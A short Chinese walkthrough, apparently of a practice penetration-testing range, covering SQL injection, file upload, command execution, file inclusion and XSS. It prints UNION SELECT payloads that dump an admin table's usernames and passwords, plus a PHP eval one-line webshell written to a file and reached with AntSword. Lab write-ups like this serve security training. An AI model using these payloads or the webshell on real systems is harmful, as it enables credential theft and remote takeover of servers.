SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

3.三处都是回显点

4.联合查询爆出库名

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

2.上传一句话木马进去

3.将文件地址拼接到网址后进行访问

4.使用蚁剑连接

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

2.尝试输入ls有效

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php

4.复制地址用蚁剑连接

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

2.访问php文件复制地址蚁剑连连接即可

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

相关推荐
云老大TG:@yunlaoda3603 小时前
华为云国际站代理商TaurusDB的成本优化体现在哪些方面?
大数据·网络·数据库·华为云
TG:@yunlaoda360 云老大3 小时前
华为云国际站代理商GeminiDB的企业级高可用具体是如何实现的?
服务器·网络·数据库·华为云
tmj014 小时前
Sqlmap命令详解
web安全·sqlmap
QQ14220784495 小时前
没有这个数据库账户,难道受到了sql注入式攻击?
数据库·sql
残 风5 小时前
pg兼容mysql框架之语法解析层(openHalo开源项目解析)
数据库·mysql·开源
勇往直前plus5 小时前
MyBatis/MyBatis-Plus类型转换器深度解析:从基础原理到自定义实践
数据库·oracle·mybatis
cyhysr5 小时前
sql将表字段不相关的内容关联到一起
数据库·sql
九皇叔叔5 小时前
MySQL 数据库 MVCC 机制
数据库·mysql
此生只爱蛋6 小时前
【Redis】Set 集合
数据库·redis·缓存
bjzhang756 小时前
C#操作SQLite数据库
数据库·sqlite·c#